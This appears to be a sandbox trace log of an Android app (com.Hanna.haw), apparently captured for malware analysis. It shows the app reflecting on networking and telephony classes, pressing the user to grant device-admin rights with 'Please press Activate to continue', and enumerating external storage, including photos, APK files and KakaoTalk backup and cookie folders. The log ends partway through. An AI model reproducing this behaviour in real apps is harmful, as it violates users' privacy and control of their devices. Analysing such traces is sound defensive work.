D/S4URC   ( 3713): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.net.HttpURLConnection]
D/S4URC   ( 3713): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.okhttp.internal.http.HttpURLConnectionImpl]
D/S4URC   ( 3713): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.net.Socket]
D/S4URC   ( 3713): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.telephony.TelephonyManager]
D/S4URC   ( 3713): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.os.Debug]
D/S4URC   ( 3713): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.hardware.SensorManager]
D/S4URC   ( 3713): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.content.res.ResourcesKey]
D/S4URC   ( 3713): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.ResourcesManager]
D/S4URC   ( 3713): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/app/com.Hanna.haw-1/base.apk]
D/S4URC   ( 3713): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.Hanna.haw]
D/S4URC   ( 3713): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.Hanna.haw/cache]
D/S4URC   ( 3713): [SDK] [java.io.File] [mkdirs] [FilePath][String] [/data/data/com.Hanna.haw/cache]
D/S4URC   ( 3713): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.Hanna.haw/cache]
D/S4URC   ( 3713): [SDK] [android.app.Activity][onCrate] [Class][ComponentInfo{com.Hanna.haw/com.Hanna.haw.XyfurthestQOlORk}]
D/S4URC   ( 3713): [SDK] [android.app.ApplicationPackageManager] [getApplicationInfo] [FindApplicationName][String] [com.Hanna.haw]
D/S4URC   ( 3713): [SDK] [android.app.Activity][onCrate] [Class][ComponentInfo{com.Hanna.haw/com.Hanna.haw.practical.WhfinishJZvUAl}]
D/S4URC   ( 3713): [SDK] [android.content.Intent] [Constructor] [IntentInfo][String] [android.app.action.ADD_DEVICE_ADMIN]
D/S4URC   ( 3713): [SDK] [android.app.Activity] [startActivityForResult] [Intent][Intent { act=android.app.action.ADD_DEVICE_ADMIN (has extras) }] [Exrar][key : value :android.app.extra.ADD_EXPLANATION ,Please press 'Activate' to continue. android.app.extra.DEVICE_ADMIN ,ComponentInfo{com.Hanna.haw/com.Hanna.haw.practical.AlphysicianMQjUMt} ]
D/S4URC   ( 3713): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.Hanna.haw]
D/S4URC   ( 3713): [SDK] [android.app.Activity] [startActivityForResult] [Intent][Intent { act=android.app.action.ADD_DEVICE_ADMIN (has extras) }] [Exrar][[key:value][android.app.extra.ADD_EXPLANATION:Please press 'Activate' to continue.][android.app.extra.DEVICE_ADMIN:ComponentInfo{com.Hanna.haw/com.Hanna.haw.practical.AlphysicianMQjUMt}]]
D/S4URC   ( 3713): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.Hanna.haw/shared_prefs]
D/S4URC   ( 3713): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.Hanna.haw/shared_prefs/semipref.xml]
D/S4URC   ( 3713): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/data/com.Hanna.haw/shared_prefs/semipref.xml.bak]
D/S4URC   ( 3713): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.Hanna.haw/shared_prefs/semipref.xml]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3713): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.Hanna.haw/shared_prefs/semipref.xml.bak]
D/S4URC   ( 3713): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.Hanna.haw/shared_prefs/semipref.xml]
D/S4URC   ( 3713): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.Hanna.haw/shared_prefs/semipref.xml]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE] [Method][getIong] [Iong][ping_time] [Return][0]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE] [Method][getInt] [Int][period] [Return][0]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE] [Method][getIong] [Iong][ping_time] [Return][0]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE] [Method][putLong] [Key][ping_time] [Value][1528863004198]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE] [Method][apply]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][domens] [Return][empty]
D/S4URC   ( 3713): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.Hanna.haw/shared_prefs/semipref.xml]
D/S4URC   ( 3713): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.Hanna.haw/shared_prefs/semipref.xml]
D/S4URC   ( 3713): [SDK] [java.io.File] [getParent] [FilePath][String] [/data/data/com.Hanna.haw/shared_prefs/semipref.xml]
D/S4URC   ( 3713): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/data/com.Hanna.haw/shared_prefs]
D/S4URC   ( 3713): [SDK] [java.io.File] [mkdir] [FilePath][String] [/data/data/com.Hanna.haw/shared_prefs]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3713): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.Hanna.haw/shared_prefs]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][id] [Return][empty]
D/S4URC   ( 3713): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.Hanna.haw/shared_prefs/semipref.xml]
D/S4URC   ( 3713): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0]
D/S4URC   ( 3713): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard1]
D/S4URC   ( 3713): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/usb2host]
D/S4URC   ( 3713): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/usb3device]
D/S4URC   ( 3713): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/usb3host]
D/S4URC   ( 3713): [SDK] [java.io.File] [listFiles] [FilePath][String] [/storage/sdcard0/Download]
D/S4URC   ( 3713): [SDK] [java.io.File] [list] [FilePath][String] [/storage/sdcard0/Download]
D/S4URC   ( 3713): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0]
D/S4URC   ( 3713): [SDK] [android.os.Environment] [getExternalStorageDirectory] [DirectoryPath][String] [/storage/sdcard0]
D/S4URC   ( 3713): [SDK] [java.io.File] [listFiles] [FilePath][String] [/storage/sdcard0]
D/S4URC   ( 3713): [SDK] [java.io.File] [list] [FilePath][String] [/storage/sdcard0]
D/S4URC   ( 3713): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.Hanna.haw/shared_prefs/semipref.xml]
D/S4URC   ( 3713): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/com.Hanna.haw/shared_prefs/semipref.xml.bak]
D/S4URC   ( 3713): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/LOST.DIR]
D/S4URC   ( 3713): [SDK] [java.io.File] [listFiles] [FilePath][String] [/storage/sdcard0/LOST.DIR]
D/S4URC   ( 3713): [SDK] [java.io.File] [list] [FilePath][String] [/storage/sdcard0/LOST.DIR]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/.android_secure]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/.android_secure]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Music]
D/S4URC   ( 3713): [SDK] [java.io.File] [listFiles] [FilePath][String] [/storage/sdcard0/Music]
D/S4URC   ( 3713): [SDK] [java.io.File] [list] [FilePath][String] [/storage/sdcard0/Music]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Podcasts]
D/S4URC   ( 3713): [SDK] [java.io.File] [listFiles] [FilePath][String] [/storage/sdcard0/Podcasts]
D/S4URC   ( 3713): [SDK] [java.io.File] [list] [FilePath][String] [/storage/sdcard0/Podcasts]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Ringtones]
D/S4URC   ( 3713): [SDK] [java.io.File] [listFiles] [FilePath][String] [/storage/sdcard0/Ringtones]
D/S4URC   ( 3713): [SDK] [java.io.File] [list] [FilePath][String] [/storage/sdcard0/Ringtones]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Alarms]
D/S4URC   ( 3713): [SDK] [java.io.File] [listFiles] [FilePath][String] [/storage/sdcard0/Alarms]
D/S4URC   ( 3713): [SDK] [java.io.File] [list] [FilePath][String] [/storage/sdcard0/Alarms]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Notifications]
D/S4URC   ( 3713): [SDK] [java.io.File] [listFiles] [FilePath][String] [/storage/sdcard0/Notifications]
D/S4URC   ( 3713): [SDK] [java.io.File] [list] [FilePath][String] [/storage/sdcard0/Notifications]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Pictures]
D/S4URC   ( 3713): [SDK] [java.io.File] [listFiles] [FilePath][String] [/storage/sdcard0/Pictures]
D/S4URC   ( 3713): [SDK] [java.io.File] [list] [FilePath][String] [/storage/sdcard0/Pictures]
D/S4URC   ( 3713): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/Pictures]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Pictures/11304_lores.jpg]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/Pictures/11304_lores.jpg]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Pictures/11309_lores.jpg]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/Pictures/11309_lores.jpg]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Pictures/11310_lores.jpg]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/Pictures/11310_lores.jpg]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Pictures/11314_lores.jpg]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/Pictures/11314_lores.jpg]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Pictures/11315_lores.jpg]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/Pictures/11315_lores.jpg]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Pictures/11427_lores.jpg]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/Pictures/11427_lores.jpg]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Pictures/11429_lores.jpg]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/Pictures/11429_lores.jpg]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Pictures/11432_lores.jpg]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/Pictures/11432_lores.jpg]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Pictures/11437_lores.jpg]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/Pictures/11437_lores.jpg]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Pictures/11516_lores.jpg]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/Pictures/11516_lores.jpg]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Pictures/11519_lores.jpg]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/Pictures/11519_lores.jpg]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Pictures/11520_lores.jpg]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/Pictures/11520_lores.jpg]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Pictures/15573_lores.jpg]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/Pictures/15573_lores.jpg]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Pictures/15575_lores.jpg]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/Pictures/15575_lores.jpg]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Pictures/15660_lores.jpg]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/Pictures/15660_lores.jpg]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Pictures/15663_lores.jpg]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/Pictures/15663_lores.jpg]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Pictures/15667_lores.jpg]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/Pictures/15667_lores.jpg]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Pictures/18658_lores.jpg]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/Pictures/18658_lores.jpg]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Pictures/18660_lores.jpg]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/Pictures/18660_lores.jpg]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Pictures/18664_lores.jpg]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/Pictures/18664_lores.jpg]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/Pictures/18667_lores.jpg]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/Pictures/world.topo.bathy.200406.3x5400x2700.jpg]
D/S4URC   ( 3713): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/Android]
D/S4URC   ( 3713): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/Android/data]
D/S4URC   ( 3713): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/Android/data/com.cyanogenmod.eleven/cache]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/Android/data/com.cyanogenmod.eleven/cache/ImageCache/journal]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Android/data/com.android.camera2/files]
D/S4URC   ( 3713): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/Android/data/com.cyanogenmod.filemanager]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Android/data/com.cyanogenmod.filemanager/cache]
D/S4URC   ( 3713): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/Android/data/de.robv.android.xposed.installer]
D/S4URC   ( 3713): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/Android/data/com.android.gallery3d]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Android/data/com.android.gallery3d/cache/imgcache.idx]
D/S4URC   ( 3713): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/Android/data/com.android.browser]
D/S4URC   ( 3713): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/Android/data/com.google.android.gms]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Android/data/com.google.android.gms/files]
D/S4URC   ( 3713): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/Android/data/com.google.android.youtube]
D/S4URC   ( 3713): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/Android/data/com.google.android.youtube/cache]
D/S4URC   ( 3713): [SDK] [java.io.File] [listFiles] [FilePath][String] [/storage/sdcard0/Android/data/com.google.android.youtube/cache/exo]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Android/data/cd]
D/S4URC   ( 3713): [SDK] [java.io.File] [listFiles] [FilePath][String] [/storage/sdcard0/Android/data/com.mods.minecraft.pe/cache]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/Android/data/com.mods.minecraft.pe/cache/uil-images/5fgfqjza3pb3hc7g19w0am7ie.0]
D/S4URC   ( 3713): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/Android/data/com.smlds]
D/S4URC   ( 3713): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/Android/data/com.smlds/cache]
D/S4URC   ( 3713): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/Android/data/com.qca.fcbumoc.nvigvci]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/Android/data/com.qca.fcbumoc.nvigvci/IGof]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/Android/data/com.qca.fcbumoc.nvigvci/rosacb]
D/S4URC   ( 3713): [SDK] [java.io.File] [listFiles] [FilePath][String] [/storage/sdcard0/Android/data/com.qca.fcbumoc.nvigvci/mqoggshg]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/Android/data/com.qca.fcbumoc.nvigvci/mqoggshg/610859BA62D9F19D3D9B923756258CDE.apk]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/Android/data/qv]
D/S4URC   ( 3713): [SDK] [java.io.File] [listFiles] [FilePath][String] [/storage/sdcard0/Android/data/qv]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/eda593572cbe5ae9918a647c03022e94.apk]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/cpf/cpf.txt]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/c6d628ea42c46611ec6ab81814f5a04d.apk]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/3415c5e6497ca724833133a007117f40.apk]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/af3c42e620c0516f010494d46d467603.apk]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/af3c42e620c0516f010494d46d467603.apk]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/403336d8c84508226387858af70bcc91.apk]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/403336d8c84508226387858af70bcc91.apk]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/85cdb59a8a0028441cf4d59cf94a5a67.apk]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/85cdb59a8a0028441cf4d59cf94a5a67.apk]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/pms_file]
D/S4URC   ( 3713): [SDK] [java.io.File] [listFiles] [FilePath][String] [/storage/sdcard0/pms_file]
D/S4URC   ( 3713): [SDK] [java.io.File] [list] [FilePath][String] [/storage/sdcard0/pms_file]
D/S4URC   ( 3713): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/pms_file]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/pms_file/Log.txt]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/pms_file/Log.txt]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/net.ib.android.smcard]
D/S4URC   ( 3713): [SDK] [java.io.File] [listFiles] [FilePath][String] [/storage/sdcard0/net.ib.android.smcard]
D/S4URC   ( 3713): [SDK] [java.io.File] [list] [FilePath][String] [/storage/sdcard0/net.ib.android.smcard]
D/S4URC   ( 3713): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/net.ib.android.smcard]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/net.ib.android.smcard/.intro]
D/S4URC   ( 3713): [SDK] [java.io.File] [listFiles] [FilePath][String] [/storage/sdcard0/net.ib.android.smcard/.intro]
D/S4URC   ( 3713): [SDK] [java.io.File] [list] [FilePath][String] [/storage/sdcard0/net.ib.android.smcard/.intro]
D/S4URC   ( 3713): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/net.ib.android.smcard/.intro]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/net.ib.android.smcard/.intro/image]
D/S4URC   ( 3713): [SDK] [java.io.File] [listFiles] [FilePath][String] [/storage/sdcard0/net.ib.android.smcard/.intro/image]
D/S4URC   ( 3713): [SDK] [java.io.File] [list] [FilePath][String] [/storage/sdcard0/net.ib.android.smcard/.intro/image]
D/S4URC   ( 3713): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/net.ib.android.smcard/.intro/image]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/net.ib.android.smcard/.intro/image/1.png]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/net.ib.android.smcard/.intro/image/1.png]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/net.ib.android.smcard/.intro/image/2.png]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/net.ib.android.smcard/.intro/image/2.png]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/net.ib.android.smcard/.intro/zip]
D/S4URC   ( 3713): [SDK] [java.io.File] [listFiles] [FilePath][String] [/storage/sdcard0/net.ib.android.smcard/.intro/zip]
D/S4URC   ( 3713): [SDK] [java.io.File] [list] [FilePath][String] [/storage/sdcard0/net.ib.android.smcard/.intro/zip]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/wisemobile]
D/S4URC   ( 3713): [SDK] [java.io.File] [listFiles] [FilePath][String] [/storage/sdcard0/wisemobile]
D/S4URC   ( 3713): [SDK] [java.io.File] [list] [FilePath][String] [/storage/sdcard0/wisemobile]
D/S4URC   ( 3713): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/wisemobile]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/wisemobile/smartars_action.properties]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/wisemobile/smartars_action.properties]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/a0fcf48d8d1f3042891f81649539b4aa.apk]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/a0fcf48d8d1f3042891f81649539b4aa.apk]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/KakaoTalk]
D/S4URC   ( 3713): [SDK] [java.io.File] [listFiles] [FilePath][String] [/storage/sdcard0/KakaoTalk]
D/S4URC   ( 3713): [SDK] [java.io.File] [list] [FilePath][String] [/storage/sdcard0/KakaoTalk]
D/S4URC   ( 3713): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/KakaoTalk]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/KakaoTalk/Backup]
D/S4URC   ( 3713): [SDK] [java.io.File] [listFiles] [FilePath][String] [/storage/sdcard0/KakaoTalk/Backup]
D/S4URC   ( 3713): [SDK] [java.io.File] [list] [FilePath][String] [/storage/sdcard0/KakaoTalk/Backup]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/KakaoTalk/cookie]
D/S4URC   ( 3713): [SDK] [java.io.File] [listFiles] [FilePath][String] [/storage/sdcard0/KakaoTalk/cookie]
D/S4URC   ( 3713): [SDK] [java.io.File] [list] [FilePath][String] [/storage/sdcard0/KakaoTalk/cookie]
D/S4URC   ( 3713): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/KakaoTalk/cookie]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/KakaoTalk/cookie/.57f323da7592b0b5de1360de3da701b0d1aa6627]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/KakaoTalk/cookie/.57f323da7592b0b5de1360de3da701b0d1aa6627]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/KakaoTalk/store_cache]
D/S4URC   ( 3713): [SDK] [java.io.File] [listFiles] [FilePath][String] [/storage/sdcard0/KakaoTalk/store_cache]
D/S4URC   ( 3713): [SDK] [java.io.File] [list] [FilePath][String] [/storage/sdcard0/KakaoTalk/store_cache]
D/S4URC   ( 3713): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/KakaoTalk/store_cache]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/KakaoTalk/store_cache/299a7c5e7f7074e17209c631ed757a0]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/KakaoTalk/store_cache/299a7c5e7f7074e17209c631ed757a0]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/0d4529db7951e9c44a6e7888f49ee84b.apk]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/0d4529db7951e9c44a6e7888f49ee84b.apk]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/a94f3bf6214d5f75586d0e27d9dc38ca.apk]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/a94f3bf6214d5f75586d0e27d9dc38ca.apk]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/1d0845f49f0c5c71e8d0204886fbe3e2.apk]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/1d0845f49f0c5c71e8d0204886fbe3e2.apk]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/roms]
D/S4URC   ( 3713): [SDK] [java.io.File] [listFiles] [FilePath][String] [/storage/sdcard0/roms]
D/S4URC   ( 3713): [SDK] [java.io.File] [list] [FilePath][String] [/storage/sdcard0/roms]
